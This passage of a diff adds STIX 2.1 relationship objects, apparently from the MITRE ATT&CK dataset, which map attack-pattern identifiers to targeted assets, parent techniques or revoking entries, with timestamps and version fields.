"attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--60d24337-4634-4eef-9d7e-033949228869", + "created": "2020-02-18T16:39:06.481Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d", + "target_ref": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--60dc8e9b-e6c0-4524-a94d-ebf9dd86e70b", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--60de1baa-df27-4140-81ef-b9f6006a210b", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--60e22d09-e5bd-4e5b-98e8-db4646febc56", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--60ea7b8f-2bcc-41f1-b879-761a1256cdec", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09b008a9-b4eb-462a-a751-a0eb58050cd9", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--612731e9-e3e6-4f02-984b-67f3b9303e2f", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--613f72e7-e085-495b-8729-e7a1c9bd246b", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6141e3c5-4dee-43b0-b309-571e0feef1dd", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--616202de-7fcd-4ca5-bd40-b15db88ce9d1", + "created": "2024-05-22T17:20:09.802Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T02:19:06.006Z", + "description": "Asset Mapping Rationale: Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.", + "relationship_type": "targets", + "source_ref": "attack-pattern--7efba77e-3bc4-4ca5-8292-d8201dcd64b5", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6162059a-a4e8-4003-bcfa-2fa51ad81c0e", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--618cfee6-a12a-4e17-b66b-cbd965a08357", + "created": "2020-03-19T15:12:13.292Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--39a130e1-6ab7-434a-8bd2-418e7d9d6427", + "target_ref": "attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--61ab003c-3691-467d-b384-611a27bf862b", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--61c46ea6-0b04-4393-a660-3b152651ed4e", + "created": "2024-06-21T14:12:20.269Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.269Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--61ce900a-04d5-4a47-be0c-373d4092613c", + "created": "2024-06-27T09:33:28.355Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:33:28.355Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--61d1a496-7daa-4c92-bbc1-a8cb815da65c", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--61d9b6a9-2cea-41e9-8612-e70a64ea4d0e", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--61ea0450-24ef-4077-b5f4-2946e4eaa9b9", + "created": "2021-06-07T13:20:23.810Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff", + "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6206244c-84b8-48bb-8ca5-a01fef23bfc2", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6211dbbf-6d37-4540-9fe6-69d0da7fabd8", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1bae753e-8e52-4055-a66d-2ead90303ca9", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--621ea557-78da-4ff6-afad-017f64a9e1fd", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--62231673-d473-4520-a63d-79872177d43b", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--62248cd9-d997-468e-8606-6fa0c36330f4", + "created": "2020-03-19T15:09:47.213Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--aa8bfbc9-78dc-41a4-a03b-7453e0fdccda", + "target_ref": "attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--624c4ae2-f367-4be2-a584-0fb5ec94c694", + "created": "2020-07-01T18:23:25.252Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd", + "target_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--625b6cd6-2474-4f29-83c6-4bfbc2b0ccc7", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--625d664c-06b0-49c5-9365-a9a7d4ecf193", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6289bb20-f9d3-49a6-a3a8-f1c1a13ca4a1", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5909f20f-3c39-4795-be06-ef1ea40d350b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--62959831-1f76-4274-b462-731fcffd164d", + "created": "2020-02-18T16:51:57.989Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--56ff457d-5e39-492b-974c-dfd2b8603ffe", + "target_ref": "attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--62a93827-11be-4064-aea7-3a05652b2e13", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e51137a5-1cdc-499e-911a-abaedaa5ac86", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--62abe387-10a2-414b-881c-060b70db2157", + "created": "2023-09-28T20:08:39.992Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:08:39.992Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--62beaaab-d6db-44c7-ad80-7a7a6940996f", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--62ddfe4b-9ddf-4c9f-8c53-571b8e431fa7", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--62f68a8f-67db-4e08-a6ae-1012970ce00d", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--63097f33-1259-4120-8fb0-3a1cf1b6d4ec", + "created": "2020-02-12T16:34:07.077Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--91ce1ede-107f-4d8b-bf4c-735e8789c94b", + "target_ref": "attack-pattern--a2029942-0a85-4947-b23c-ca434698171d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--630eb861-eb37-4258-9dbd-87789df2257a", + "created": "2024-03-26T15:41:26.772Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-03-26T15:41:26.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--77d9c726-b53e-481d-8bcc-1068aebfbb9d", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--632e44a7-833f-4c91-bdae-9a3c4df7db6b", + "created": "2020-01-24T18:38:56.163Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4", + "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--633b6287-5c08-472a-b512-f122f96c503b", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--634c8352-a9db-44f2-afc6-3bda5c65f92d", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--636ec213-31ce-4e0a-863c-8add1cae68c3", + "created": "2020-02-19T18:54:47.777Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0", + "target_ref": "attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + 